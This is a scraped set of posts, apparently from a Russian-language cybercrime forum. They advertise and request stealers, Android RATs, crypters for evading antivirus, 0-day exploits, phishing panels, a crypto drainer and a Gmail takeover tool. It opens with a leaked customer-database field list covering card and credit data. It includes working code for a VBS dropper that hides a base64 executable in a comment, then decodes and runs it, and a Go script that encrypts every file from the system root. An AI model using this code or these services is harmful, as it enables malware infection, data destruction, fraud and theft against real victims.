id id_registro nombre ap_paterno ap_materno rfc direccion telefono celular telefono_empresa fecha_nacimiento calle numero_exterior numero_interior colonia estado ciudad delegacion codigo_postal email cuenta tarjeta tipo_tarjeta saldo_anterior saldo_actual dias_mora descuento pago_minimo importe_pagar importe_descuento limite_credito fecha_corte tramo origen status id_base status_base fecha_registro created_at updated_at
Click to expand...
COMPANY INFO: We are an omnichannel contact center company offering you end- to-end solutions in customer service, lead generation and digital marketing. Attract, retain and capture your customers' attention through our channels: contact center, email marketing, SMS, social media and web development. Implement vertical strategies using our infrastructure, being experts in technology, delivering comprehensive contact solutions quickly, efficiently and with great impact.
Our main goal at ECD is to offer services tailored to each client, provide personalized service and ensure the success of each project.
Приветствую. Ищу кодера для написания сканера под уязвимость bluekeep
Подробности в ПМ
Продам, цена 60к$, в одни руки, ВЭБ! Подробности в ПМ.
Приветсвую, делаем инжекты для ваших зверей, под ключ любой функцианал
Выдаем полностью функицанирующий накрытый архив
Работаем только с гарантом, фикс + % с учетом поддержки.
We are looking for Anydesk Exploit to get user's crypto seeds just from being logged in anydesk, upfront/% whatever, message us in pms.
Приветствую!
Ищу партнера в хозяйтве у которого имеется Android бот.
Для уникального направление работы, и совместного дополнение друг друга.
Все подробности в ЛС
Spoiler: закрыто на депозит 11000$
Android bot Written from scratch,
written, Java language. Work and Tested on real devices with Android 9-14:
Samsung, , Xiaomi, Google etc.
FULL VNC + HVNC - works under multiple overlay,
Keylogger +Push + injections + stealer, 2fa + card details. etc.
additionally APK builder is automatic with free encryption. free injections
for all apps offer. 1k for testing.
everything will be done using the Escrow system of this forum.
contact: tg vixtoto
Уязвимость исправлена 11 июня 2024 года, но публичных реализаций на момент публикации этого предложения нет.
Уязвимость находится в стандартном драйвере Windows и позволяет читать/писать
ядерную память.
В качестве демонстрации представлен PoC с повышением привилегий до уровня nt
authorirty/system.
PoC тестировался на Windows 10 20H2, Windows 11 22H2 и работает от Medium IL.
У уязвимости существует ограничение - не работает в среде Hyper-V.
В продажу входят:
1. Исходные коды (С++)
2. Скомпилированный семпл (x64-bit)
Готов ответить в ПМ заинтересованным покупателям на другие интересующие
вопросы.
Продажа в одни руки.
Цена - 15k$
Продажа через гаранта(за Ваш счет) либо заинтересованным брокерам с
депозитом.
И так знач, устал я от рутинной работы, и как выдалась свободная минутка,
создал дроппер вбс.
Кратко, конвертируем файл в base64, записываем как комент в первую строку,
затем расшифровываем дропаем и запускаем.
start.vbs
Code:Copy to clipboard
Dim objFSO, strFilePath, byteData, base64Encoded, stream, filePath, additionalText
strFilePath = "putty.exe"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set stream = CreateObject("ADODB.Stream")
byteData = ReadBinaryFile(strFilePath)
base64Encoded = EncodeBase64(byteData)
base64Encoded = Replace(base64Encoded, vbCrLf, "")
base64Encoded = Replace(base64Encoded, vbLf, "")
base64Encoded = Replace(base64Encoded, vbCr, "")
objFSO.CopyFile "tmp.vbs","2.vbs",True
filePath = "2.vbs"
additionalText = "'"&base64Encoded
stream.Type = 2
stream.Charset = "utf-16"
stream.Open
On Error Resume Next
stream.LoadFromFile filePath
On Error GoTo 0
stream.Position = stream.Size
stream.WriteText vbCrLf & additionalText
stream.SaveToFile filePath, 2
stream.Close
Function ReadBinaryFile(filePath)
Dim stream
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.LoadFromFile(filePath)
ReadBinaryFile = stream.Read()
stream.Close
Set stream = Nothing
End Function
Function EncodeBase64(data)
Dim objXML, objNode
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.CreateElement("base64")
objNode.DataType = "bin.base64"
objNode.NodeTypedValue = data
EncodeBase64 = objNode.Text
Set objNode = Nothing
Set objXML = Nothing
End Function
tmp.vbs
Code:Copy to clipboard
Dim objFSO, objFile, base64Data, decodedData, filePathOutput, lastLine, remainingLine, allLines
Set objFSO = CreateObject("Scripting.FileSystemObject")
currentScriptPath = WScript.ScriptFullName
Set objFile = objFSO.OpenTextFile(currentScriptPath, 1, False, -1)
allLines = objFile.ReadAll
objFile.Close
Dim lines
lines = Split(allLines, vbCrLf)
lastLine = lines(UBound(lines))
If Len(lastLine) > 0 Then
remainingLine = Mid(lastLine, 2)
Else
remainingLine = ""
End If
filePathOutput = "decoded_output.exe"
base64Data = remainingLine
decodedData = DecodeBase64(base64Data)
WriteBinaryFile filePathOutput, decodedData
CreateObject("WScript.Shell").Run "decoded_output.exe"
Function DecodeBase64(base64String)
Dim xmlObj, nodeObj
Set xmlObj = CreateObject("MSXML2.DOMDocument")
Set nodeObj = xmlObj.createElement("base64")
nodeObj.dataType = "bin.base64"
nodeObj.Text = base64String
DecodeBase64 = nodeObj.nodeTypedValue
Set nodeObj = Nothing
Set xmlObj = Nothing
End Function
Sub WriteBinaryFile(filePath, binaryData)
Dim stream
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write binaryData
stream.SaveToFile filePath, 2
stream.Close
Set stream = Nothing
End Sub
**После покупки покупатель получает: login:password + ласт версию панели Redline
!!! ПРОДАЖА СТРОГО В ОДНИ РУКИ !!!
НЕ КРЯК! ЛИЦЕНЗИЯ!
Причина продажи: Купил себе другой стиллак
Согласен на гаранта (https://xss.is/escrow/)**
Spoiler: Закрыто на депозит 50000$
Vulnerability allows saving and restoring old data from clipboard on macOS due to insufficient buffer clearing. Exploited through data injection into clipboard and accumulation of sensitive information (passwords, tokens, cryptocurrency addresses).
The exploit has been tested on macOS 12.6. It bypasses defense mechanisms such as Stack Canary and DEP.
Price: 50k
pm escrow reputation
Hi
I need OV cert (without pre scan)
Seller send pm plz
Ищу Nanocore Source code
Hi, I'm selling a 0day exploit on an RMM application
The price is fixed at 60.000$ USD
I understand that my account was created recently, and to ensure that both parties are not scammed I only accept to do it through escrow
Only contact me if you are really interested in buying
For more information please contact me at TOX:
1A996CED1B540FF07C1802B21A90EBB315775DFF252420B2D08F92F2DFD4ED2E7E4F82AD2C22
JS Fake Iframe\Redirect Tools - больше не нужно тратить время на фейки для шопов!
Рад представить новый продукт - библиотека для быстрого создания фейковых форма для абсолютно разных ситуаций. Если вам нужно сделать фейковый редирект или iframe и вы не разбираетесь в программировании (но чуть-чуть нужно будет) , то этот продукт для Вас!
Если вы разбираетесь в программировании, но хотите сократить время на создание фейков - этот продукт для Вас!
Из чего на данный момент состоит продукт?
Так же готовится подробный мануал по работе + Документация(!) по библиотеке для продвинутых.
Например на вашем шопе есть iframe страйп или другой и вам надоело делать
постоянно фейки разные?
На вашем шопе гнусные оплаты через редирект?
Ваша проблема решится с продуктом. За 10 минут вы будете способны сделать практически любой фейк.
Продукт на стадии тестирования и любые баги мы будем решать по мере поступления!
Цена продукта - 1500$ (lifetime) и ,как всегда, отличная поддержка!
Контакты:
ЛС или Telegram
Тема на соседнем форуме:
Ищу криптора с ником ID2K24 в телеге
сегодня телега снесла его акк, нужен контакт
здесь на форуме есть
Spoiler: Закрыто на депозит: $300
Предоставляю уникальную услугу крипта ваших файлов. Крипт ручной, по времени занимает от 10 минут до 24 часов (в зависимости от нагрузки и вашего файла).
Всегда приватный стаб, без паблика. Каждый новый клиент - уникальное решение, без повторов.
Обход WinDef + 0-1/26 на любом скане. Согласен на гаранта.
Цена фиксированная - $79 один файл.
Постоянным клиентам скидки, на оптовые заказы предоставляю другие условия.
Связь в жабе: malware@sure.im — других контактов нет. Токс, телеграмм и прочие мессенджеры не использую.
Есть лоадер, который легко справляется с дефендером и закрепляет в системе майнер xmrig, работает только когда юзер бездействует, а также поставляет хэшрейт не напрямую пулу, а через xmrig-proxy (такая штука, помогающая собирать большое количество воркеров в один, складывая хэшрейт), но может и напрямую в пул.
Из доработок, ещё нет метода эскалации до админа, пока промптит UAC.
В целом, максимально базовый установщик майнера, но по сути, если попадется
правильному пользователю, может долго оставаться в системе, плюс ещё можно
поэкспериментировать с настройками для лучшей эффективности.
Настройки можно захардкодить в билде, либо изменять в pastebin и фетчить при
каждом запуске.
От SilentCryptoMiner пока далек продукт, но имхо там и слишком много не совсем нужных фич, слишком сильный упор на закрепление в системе, не гибкое решение так скажем, а пользователь если заметил и захотел удалить то он это сделает как мне кажется, вне зависимости от отдельного процесса watchdog, от инжекта, process killer'a, изменения hosts и т.д., Единственное, что было бы полезно это инжект в searchindexer, к примеру, но в целом это не критично.
В общем, может быть у кого то будет мысль как и где эту штуку можно применить, пока просто лежит, сам я в распространении .exe по пк полный 0.
P.S. Многие конечно к майнингу скептически относятся, но на недели был пик хэшрейта сети монеро 3.7gh/s и цена тоже подскочила слегка, поэтому думаю тема не прям для динозавров.
RU
Это готовое решение для создания чистого пользователя.
Что это значит?
После запуска на целевом пк, появляется дополнительный пользователь, на которого не работают правила.
После создания пользователя, автоматический unlogon текущего пользователя и авторизация в нового.
Автоматический запуск вашей программы после захода на пользователя.
Анти антивирус,Анти защита файлов(Можно даже папку с WinDef удалить)
Приложения установленные для ВСЕХ узеров так же не установлены на чистого пользователя.
Вы имеете доступ ко всем файлам на всех дисках.
проверена начиная с Win server 2008 + Win 11
ENG
This is a ready-made solution for creating a Clean user.
What does it mean?
After launch, an additional user appears on the target PC, for whom the rules do not apply.
After creating a user, automatic unlogon of the current user and authorization into the new one.
Automatic launch of your program.
Anti-antivirus, Anti-protection files (You can remove the folder WinDef)
Applications installed for ALL users are also not installed on a clean user.
Access to all files on all drives.
Tested starting with Win server 2008 + Win 11.
BONUS
Способ удаления из системы 90% Антивирусов от текущего пользователя
Method for removing 90% of Antiviruses from the current user from the system
Price: 2k
contact:
DAB30747E4650B1D71A30E199FE07AED62239661B7EFA109AFA8E0821690D12B2FF84CE2A114
Spoiler: Закрыто на депозит: $100
Продаю метод крипта апк, кракс работает SUN_META
All av's bypassed.
Gplay bypassed.
Long fud time.
I meanly working with botnets, so i know how to crypt these things
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FLyWF3R_jkTdQTwAVQ-G3-aYCcgMtMFLfsed6pdhmfrVDAQAELbIPdYrv_chqhsj-7dVXWZjoWTUEXUqyt7CYV7e1bhcR7Dvfhfpi8PNypv0xdFtAZ9MkCVBfR0c938ki- GglZAHQhn24j654fBTRK8lhpWNcdAGUrscPaSLFaOD0bmEvtRjpim260vHoIqnOQauXz9x1svM1l4fkUiHBTawgL6zzFz_7mJQCdRmVm8-Bl6F_eqH_5m2S4aYg0xBms0DBefCqLO4K7yzaiBegjqp5B1ZDfZNCc53Oxzy9grldb2T4aaRChTwv5HY09AlyaooCpbQMGVTrQ1b5GAHwwA.jpg&hash=5ed61e9ec3404b55f860c051b12a98da&return_error=1)
.
t.me
I accept guarantor.
Куплю разработку фреймворка c2. за основу можно взять havoc.
Конечный продукт должен соответствовать всему функционалу nighthawk 0.3.3.
Приоритет - чистый рантайм и скантайм.
Предложения с описанием ваших навыков, сроков и цены пишите в PM.
Hey, im looking for a PDF exploit that can contain an .exe file that is completely undetectable by all antiviruses and can be sent by email, including Gmail.
contact telegram: @exduckyb
Spoiler: Закрыто на депозит. Closed for deposit. 10k$
**MGMT LOOKING FOR NEW MEMBERS
Windows stealer with bypass + FUD, 24/7 checks on domains + payload (MAC COMING SOON)
Exploits / private methods for larger targets.
**Callers, eu, usa, uk all 24/7 to assist on victims
Withdraw everything, Staking, extensions, nfts, staking, personal finance. Everything can be done.
using best stealer with highest knock rate on the market
Manual / video tutorials to get you onboard ASAP With professionals that has done this for years to help you along the way.
Projects from scratch / unknown to stay undetected as much as possible.
Active developer / team, 24/7 support and assistance.**
CONTACT:
TELEGRAM: @MGMTVENOM
SESSION:
053d246533b177ca99740e635da00b8e5804fa4ef241b9a3bde9abb77022770726**
TO WORK WITH US!
Spoiler: Закрыто на депозит | Closed For Deposit | 500$
I sell the method of crypto apk
Tg: @adengi_ru
Ищу человека для проверок своего лоадера на edr интересуют все edr Crowdstrike, Sentinel, PaloAlto, Carbon Black и так далее. Возможны сканы на отдельных edr. Готов хорошо платить за месяц вперед. Связь пм.
Looking for a way to control screen without being seen by victim on rat. This is not HVNC, what i want to do need to use the real pc
Привет, ищу кто сможет сделать 8 инжектов html
Нужен кодер для написания проекта для брута аккаунтов Sparkasse, Volks. За подробностями в личку
Нужно написать стиллер для лаунчера Exbo и стим, свою цену прошу писать в тему
Im searching for Stealer Logs (all logins) from one person all of the world
LOOKING TO BUY FOR $$$$
I need to rent crypt RAT with Private Stub quality. If it works well, I will rent it long term.
I need to rent crypt RAT (old dcrat) for about $100 with Private Stub quality.
Request:
1. 100% FUD (I only spread out about 25-30 computers a day so I need it up
for at least a week.)
2. Has startup + docx file binder feature
TG: myphuong13579
I need a powerful and reliable DDOS panel, do you sell this service in PM? Or any recommendations? I've used a lot of them but they don't work well
Кто-нибудь видел этот репозиторий на GitHub? Кажется, очень полезный для обфусцированного выполнения, golang -> python
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F88af9465a0100b3c051a7e713ec7a7df94f7615f7b05b38021a6e54bfb90dc87%2Fcpunion%2Fgo- python&hash=b8a4568f0765914a6c3f4399516fd7fa&return_error=1)
Python wrapper for Golang ](https://github.com/cpunion/go-python)
Write Python in Go - The most intuitive Python wrapper for Golang - cpunion/go-python
github.com
Написал небольшой POC-код
Code:Copy to clipboard
package main
import (
gp "github.com/cpunion/go-python" // Импортируем обертку go-python для взаимодействия Go с Python
"os"
"runtime"
"fmt"
)
func initPythonEnvironment() {
gp.Initialize() // Инициализация среды Python через go-python
}
// Функция для обфускации шифрования каждого файла
// Принимает путь к файлу и ключ для сокрытия содержимого
func obscureFileContent(filePath string, encryptionKey string) gp.Object {
cryptoModule := gp.ImportModule("crypto") // Импортируем модуль Python 'crypto'
obscureFunc := cryptoModule.GetAttr("encrypt") // Получаем функцию 'encrypt' из модуля 'crypto'
return obscureFunc.Call(gp.MakeStr(filePath), gp.MakeStr(encryptionKey)) // Вызываем encrypt для файла
}
// Функция для рекурсивного обхода каталогов и шифрования файлов
// Использует рекурсивный подход для обхода каталогов и шифрования файлов
func recursiveTraverseAndObscure(directoryPath string, key string) {
entries, _ := os.ReadDir(directoryPath) // Читаем содержимое каталога
for _, entry := range entries {
entryPath := directoryPath + "/" + entry.Name() // Формируем полный путь для каждого элемента
if entry.IsDir() {
recursiveTraverseAndObscure(entryPath, key) // Рекурсивный вызов для каталогов
} else {
obscureFileContent(entryPath, key) // Шифруем файл
}
}
}
func main() {
initPythonEnvironment() // Инициализируем среду Python
defer gp.Finalize() // Гарантируем завершение работы Python после выполнения
var obfuscationKey = "dynamically_generated_key_789" // Ключ для шифрования файлов
var rootPath string
// Определяем корневой путь в зависимости от ОС; используем стандартные пути для Windows и Linux/Mac
if runtime.GOOS == "windows" {
rootPath = "C:\\" // Корневой путь для Windows
} else {
rootPath = "/" // Корневой путь для Linux/Mac
}
// Запускаем процесс шифрования с корневого каталога
recursiveTraverseAndObscure(rootPath, obfuscationKey)
fmt.Println("Шифрование системы завершено.") // Сообщение об успешном завершении
}
Ищу качественный крипт на бота x32. Приватный стаб в одни руки, FUD, Обход WD
100%. На выходе должен быть либо .exe либо .exe с папкой.
Долгосрочное сотрудничество
тг
Hello friends,
A bit ago I found an XSS vulnerability in a certain website's subdomain, ...indeed.tech. I have found myself in a predicament where I require an XSS vulnerability in a different website(s), and am open to trading/exchanging this XSS vulnerability for others.
It is a reflected XSS, this reflected XSS vulnerability allows an attacker to inject/execute javascript via a URL parameter, to steal sensitive information such as the victim's IP address.
I have also created an IP grabber proof of concept that works if you have a server that can receive a request through a python/flask receiver.
Open to anything.
Здравствуйте друзья,
Немного назад я нашел уязвимость XSS в поддомене определенного веб-сайта, ...indeed.tech. Я оказался в затруднительном положении, когда мне требуется уязвимость XSS на другом веб-сайте, и я открыт для торговли/обмена этой уязвимостью XSS для других.
Это отраженная XSS, эта отраженная уязвимость XSS позволяет злоумышленнику вводить/выполнять JavaScript через параметр URL, чтобы украсть конфиденциальную информацию, такую как IP -адрес жертвы.
Я также создал доказательство концепции IP-адрес захват, которое работает, если у вас есть сервер, который может получить запрос через приемник Python/Flask.
открыт для всего.
Ищу человека, имеющего опыт написания RAT-программ на c/c++. Вознаграждение щедрое. Подробно объясню вам функции. За подробностями обращайтесь в личку.
Ищу человека, который сможет произвести крипт майнера.
Через гаранта
За подробностями в ПМ
I need private encryption
java or exe
sideload with start up
Ищем реверсера для разбора софта написаного на Delphi.
Куплю исходы шкафчика, запилить с 0 не предлагайте, нето это долго) В теме со времен maza, dc не смотрите на мою новую регистрацию здесь. бюджет зависит от функционала. Для сделки требуется гарант.
Здравствуйте, на постоянку требуется криптор, цена обговаривается
файл х64 натив, х32 не предлагать
писать ПМ
Куплю вредоносное ПО с кейлоггером, возможностью скриншотов и иными полезными функциями. Необходимо для мобильных устройств (android, ios) и для ПК (необходимы на все платформы, возможно разные продукты)
В поисках толкого криптера . На постоянной основе .
Вериф ПМ .
hello guys,i want to buy good android rat.
anyone recommend a good android rat?
I need to hire Builder LNK (.ps1 ---> .lnk)
@myphuong13579
I have android botnet + rat + wnc . I need to change the design (written in GO) and add 465 injections (I'll give it).
You will approximately receive 20-25k$ monthly.
Contacts :
Hello
i need a stable jrat updated please help
I can pay $50 for this
the one i have is given me this issue below
](https://gyazo.com/b9357667beb44ed5b6471c3d106da593)
gyazo.com
Кто умеить лить шел через картинку ? опишите в лс есть крупные доступы
Нужен хороший криптер для данабот, пишите в пм
Требуется EV сертификат, сделки только через гарант форума!
Looking to buy tool that will allow me to access phone with C2, give me features and prices.
Escrow mandatory will pay fees
Telegram: Wannacriii
I either need Dll sideloading needed or some kind of lnk/url exploit that doesnt trigger a security warning when victim runs the file
аренда/ покупка
[RU LANG]
_PUSH
and SMS LISTENER for ANDROID**
**
_К продаже предлагается ANDROID приложение позволяющее перехватывать
PUSH - уведомления, SMS - сообщения и SIM - данные устройства в фоновом
режиме.
_
️
ПРОДАЖА ОСУЩЕСТВЛЯЕТСЯ В ОДНИ РУКИ В ВИДЕ ГОТОВОГО БИЛДА С ВАШИМ/МОИМ
WEBVIEW
️
**️
ОПЛАТА ПРОИЗВОДИТСЯ ЧЕРЕЗ ГАРАНТА СЕРВИСА
XSS.IS
️_**
ВЫ МОЖЕТЕ СВЯЗАТЬСЯ СО МНОЙ В ЛИЧНЫХ СООБЩЕНИЯХ
Функционал включает в себя :
Логирование в Telegram :
_• Логи автоматически отправляются в указаннуюTelegramгруппу, с созданием индивидуального топика для каждого нового подключенного устройства._
** • Ведется детальное логирование всех перехваченных PUSH-уведомлений и SMS- сообщений, время перехвата сообщения и уведомления составляет менее пяти секунд.**
** • Логи выводятся в удобочитаемом формате, позволяя быстро ориентироваться в данных и находить нужную информацию полученную от каждого устройства.**
Бесконечный запрос разрешений и фоновая работа :
_• Приложение не запустится и не будет функционировать, пока не будут предоставлены все требуемые разрешения._
_• Приложение продолжает работать в фоновом режиме, когда оно свернуто или экран устройства заблокирован, или если приложение явно закрыто пользователем._
Перехват Push-уведомлений :
_• Приложение способно перехватывать PUSH-уведомления от всех установленных на устройстве приложений._
** • Приложение извлекает все важные данные из PUSH-уведомлений, такие как заголовок, текст, имя пакета приложения отправителя.**
_• Информацию из PUSH уведомления почти мгновенно поступает в топик телеграмм группы._
Перехват SMS-сообщений :
_• Перехватывает все входящие и исходящие SMS-сообщения, так же отправляет данные всех SMS сообщений полученных устройством до установки приложения._
_• Извлечение данных: Извлекает и записывает номер отправителя, текст сообщения, время отправки/получения._
Встроенная WebView активность :
• Вы можете легко задать любую URL-ссылку в Telegram _- боте** билдере, и встроенный WebView браузер отобразит её содержимое.**_
_• APK файл компактен, билд весит всего 20 мб._
Билдер APK файлов в телеграмм боте :
_• Разработан полноценный билдер полного цикла для автоматического создания APK файлов, интегрированный в Telegram - бота, позволяющий изменять :_
** • Иконку приложения**
** • Название приложения**
** • Название пакета приложения**
** • Вес приложения** _**
• URL - ссылку для WebView**_
****Видео
работы :
****
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/3REn3KTb#kil12HRzQO0GfVwyuL0u4nWAaqwxgfGId-EfcLBMez0)
mega.nz
****
[ENG LANG]
PUSH
and SMS LISTENER for
ANDROID
_**For sale is offered ANDROID application that allows you to intercept
PUSH - notifications, SMS - messages and SIM - device data in the
background.
️
SALE IS MADE IN ONE HAND AS A READY BUILD WITH YOUR/MY WEBVIEW
️**_
**_️
PAYMENT IS MADE THROUGH THE GUARANTOR SERVICE
XSS.IS
️
YOU CAN CONTACT ME IN PRIVATE MESSAGES !_**
Features include :
Logging in Telegram :
Endless Permission Request and Background Operation :
Intercept Push notifications :
SMS Interception :
****Built- in WebView activity :
APK file builder in telegram bot :
**Developed a full-fledged full-cycle builder for automatic creation of APK files, integrated in Telegram - bot, allowing you to change :_
****Video****
:****
****
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/3REn3KTb#kil12HRzQO0GfVwyuL0u4nWAaqwxgfGId-EfcLBMez0)
mega.nz
****
hi,
looking for an android rat spreader who will work on percentage basis and
spread in targetted countries , fud apk will be provided by me. DM FOR MORE
INFO
Spoiler: Закрыто на депозит. Closed for deposit.
Есть личный TON Drainer
Поддержка всех jet tons
10+ кошельков
Логи прилетают в телеграм канал
Мультидомены
также работает telegram webapp
Оставляю скрин лога
Более детальная инфа в лс
Кто действительно заинтересован предоставлю рабочий линк на тест
Кому интересно сотрудничество или же покупка пишите в лс договоримся о цене
TG: @amfibakteria
P.S. если оставил не в том разделе , прошу не банить тему, перекиньте по возможности в нужный раздел
Доброго времени всем! Есть, кто продает лицензию Night Hawk? С предложениями в ДМ.
Доброго времени суток.
Click to expand...
**Куплю софт для брутa VPN всех видов / RDP/ IP Camers
Эксплоиты под роутеры / VPN / RDP/ IP camers
RCE веб эксплоиты, можно паблик(обсудим в лс), но желательно приват эксп
Возможна покупка паком или по отдельности, гарант форума**
spam or if you have the logs already pm
I am selling private encryptor
, it supports all exes.
Eat and clean
also shellcode bin file supported.
tg @ Bexibedu23
Runtime crypters available. Make your malware/files 100% Fud.
Also Available GUI.
Spoiler: Закрыто на депозит. Closed for deposit. 1k$
WhiteFile - инновационный сервис по шифрованию файлов, каждый файл
защищен приватным стабом. У нас вы найдете лучшие решения для ваших файлов.
• Приватная сборка — каждый файл защищён приватным стабом.
• Сборка без зависимостей, что обеспечивает его работу на любых системах,
даже на чистых.
• Ежедневные обновления для минимизации числа детектов.
По вашему желанию вы можете модифицировать ваш файл данными фишками:
• Anti-VM: запрет запуска на виртуальных машинах
• File Pump: увеличение вашего файла в размерах (до 1 гб)
• Обфускация: запутывание программного кода, чтобы сделать его непонятным
и затруднить понимание принципов его работы
Hidden content for authorized users.
Временная подписка — оптимальный вариант для тим и ежедневной модификации файлов.
• Приватная сборка — каждый файл защищён приватным стабом.
• Сборка без зависимостей, что обеспечивает работу файла на любых
системах, даже на чистых.
•Ежедневные обновления для минимизации числа детектов.
• Неограниченное количество криптов на протяжении срока действия подписки.
Цены:
30 дней - 99$
60 дней - 179$
90 дней - 249$
Hidden content for authorized users.
Уникальный крипт - лучший из всего, что мы можем предложить!
• Каждый файл накрывается своей уникальной сборкой
• Все сделано для лучшего отстука на рынке
• Чистый Runtime (до 2х детектов)
Цены:
1 крипт - 50$
5 криптов - 200$
10 криптов - 350$
30 криптов - 800$
50 криптов - 1200$
Hidden content for authorized users.
API доступ - инструмент взаимодействия ваших программ, с нашим сервисом
Мы разработали его специально для вашего удобства использования нашего сервиса
в ваших командах и программах.
Покупается отдельно от ежемесячной подпиской, только при наличии уже
купленной временной подписки.
Цены:
30 дней - 30$
БОТ
Spoiler: Закрыто на депозит. Closed for deposit. 2k$
What is Monopoly?
Monopoly is an affordable and convenient solution for creating phishing
panels. Are you tired of high costs every time you need a new live/static
panel or want to make changes to an existing one? Or maybe you are overwhelmed
by complex installation processes?
At Monopoly, we understand these issues. That's why we've developed a platform that makes your job easier. Our ever-growing library of pages is easy to install, allowing you to focus on what matters most - making money.
What does Monopoly offer?
Simple and intuitive interface: We are tired of phishing panels being
complicated and difficult to use. So we have developed a professional, easy-
to-use interface that allows you to easily manage your visitors and pages.
Hassle-free subscription system: You never have to go back and renew your subscription again. Our system automatically activates your subscription as soon as payment is received.
Easy to Deploy: Deploy new phishing sites with just a few clicks using our simplified process.
Growing Page Library: Our database of pages is always growing, and if we don't have what you need, we'll add it.
Custom Pages: Need a specific page but don't have enough tokens? No problem - you can easily add them yourself.
Affiliate Program: Invite your friends and earn up to 25% commission.
What packages does Monopoly offer?
We offer two packages available on a monthly, quarterly or annual basis:
Starting
Premium
Includes all features of the starter pack
Access to the page builder (customize your phishing pages)
Ability to request private pages
Access to future updates
Monopoly anti-bot protection
The package includes up to 6 active pages
Priority support
Interested in our services? Register today at: https://monopolyland.is/a/xss .
If you have any questions about our product, ask them below or write me a PM on the forums.
Spoiler: EN
What is Monopoly?
Monopoly is your go-to solution for affordable and user-friendly phishing panels. Are you tired of high costs every time you need a new live/static panel or want to make changes to an existing one? Or perhaps you're overwhelmed by complicated installation processes?
At Monopoly, we understand these challenges. That's why we've developed a platform that simplifies your experience. Our ever-growing library of pages is easy to install, allowing you to focus on what matters most—making money.
What Does Monopoly Offer?
What Packages Does Monopoly Offer?
We offer two packages, available on a Monthly, Quarterly, or Yearly basis:
Interested in our services? Sign up today at: https://monopolyland.is/a/xss
If you have any questions about our product, feel free to ask them below or send me a PM on the forums.
text me in the dm with your work and etc
Hello, I buy hRDP/hVNC Canada geo. Also brute force RDP if you have. PM.
Anyone have working POC of CVE-2024-40711 ?
This link below is the public POC link but not working.
CVE-2024-40711 ](https://github.com/watchtowrlabs/CVE-2024-40711)
Pre-Auth Exploit for CVE-2024-40711. Contribute to watchtowrlabs/CVE-2024-40711 development by creating an account on GitHub.
github.com
Please DM me if anyone have the working build.
I want pay for this.
Spoiler: Закрыто на депозит/Closed for deposit - 3k$
Hidden content for members of the Администратор, Модераторы groups.
Есть ли у кого-нибудь эксплойты Roundcube для CVE-2024-42009 и CVE-2024-42008? Давайте договоримся; Я готов заплатить за эксплойт.
Создам для Вас установщик Вашей полезной нагрузки под заказ, пишите в ЛС интересующий формат файла, условия, могу к примеру добавить обход дефендера
deleted
**
Устали от того, что ваши куки гугла не доживают до вашего визита? Надоело
плакать, когда почта умерла с письмом с подтверждением перевода?
Plifal- наше уникальное решение этих до боли знакомых проблем.
Наш сервис даёт возможность получить доступ к вашим gmail accounts через
exploit в обход официального api Google .
Даже если ваш cookie умрет после его загрузки в наш софт, доступ ко всей
информации, включая информацию от смежных продуктов Google.
Что умеет Plifal:**
Google Services [ Gmail, Drive, Photo, Keep, YouTube ]
- возможность скачивать все письма с почты
- множественное выделение почт и массовая обработка
- поиск по почтам: поиск по отправителю и заголовку, с возможностью точного
выбора (начинается/заканчивается с, содержит, равен). Возможность выбрать
поисковой запрос и посмотреть все письма содержащие его
- работает на web сокетах - оптимизация для командной работы с нескольких
машин
- подгрузка всех профилей с кукка
- разделение сообщений по папкам как в оригинально почте
- удобный и понятный интерфейс для работы
- Возможность скачивать вложения в письмах
- отображается количество аккаунтов
- добавлена возможность скачивать все письма с почты
- возможность выгрузить кукки аккаунта
- логирование информации об аккаунтах
- сервис работает на запросах
- при покупке подписки предоставляем апи
- удаление письма полностью из почты
- поиск писем на почте
- папки как в оригинальной почте
Цены :
1 неделя - 199$
1 месяц - 599$
Первым 5 людям даём подписку на неделю за отзыв
FAQ : https://telegra.ph/Plifal-FAQ-05-18
Telegram: @Plifal
цена договорная - от 1000$ по правилам форума
Контакты:
jabber z1dane@exploit.im
tox
AC871B4150DB40B342C6A52DEA7D47FD321BE197745846DA8BB341E3E3901822225CBA60A515
либо скидывайте свои контакты в лс - я добавлюсь
Всем привет! Знающие ребята посоветовали поискать на данной площадке, сказали
тут умельцев хватает..
Очень ищу чистый Док или аналог, который полезет аттачем. Ищу на постоянку, с
ценовой политикой знаком, опыт работы имеется.. Буду рад знакомству с
адекватным кодером с руками для постоянного сотрудничества
Привет ребята! ищу нормальный многопоточный софт брут VNC, что то у меня кряк
Z668 ( покупать не хочу) не работает, может кто что подскажет?Заранее спасибо
за советы.
Так же ищу единомышленников для обсуждения вопросов по этим темам ( одна
голова хорошо - две лучше) Моя телега: https://t.me/rewa283671
Всем привет ! К то может сделать смарт контакт в котором после подписания
транзы чистились кошельки?
С предложением в лс пожалуйста.
Spoiler: Закрыто на депозит. Closed for deposit.
Также возьму логи инвесток Fidelity / Schwab / TD с балансами 100к+ и доступом к почте
Полный список: https://telegra.ph/Linki-09-28
Ищу партнерство только по ЮСЕ до 35% в вашу сторону
Контакт:
**
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.cdn- telegram.org%2Ffile%2Fjc7ByO_Y82MII2pfTVQ9Jj29UYYokLiINztqtatyqoUMZkFj0lAoTvvacNIP3ruYvaTZHYUN2KCbFNEsfSUpVa3zMwt1xjKCAlv2ynhIzLVN-8UEf- wjFnnF6Ak4Wkg5pbyuK22KT1_ZByEMk1PK27MhgN9dSHv3SEAQMNQI1FvA- zx_oTZhweA4JULRymF_o4_rH95-wjXjr3ZKr7WTe8mYGSGZg_G9YKv51s-3e1nyoUzBLkLhn1CMl5bBQfgotTCJS27t4QaSvH5W-c0LK9bM1ewHd4zoYEX3VTBwevbo44Y7wzQZMR91CxOObujbvYFYJIzlklKk1l5Aa- DLTg.jpg&hash=8851ac85b19126bcb0bb36d4e3be820e&return_error=1)
You can contact @marktxa right away.
t.me
**
BAT BATCH CRYPT 2.0
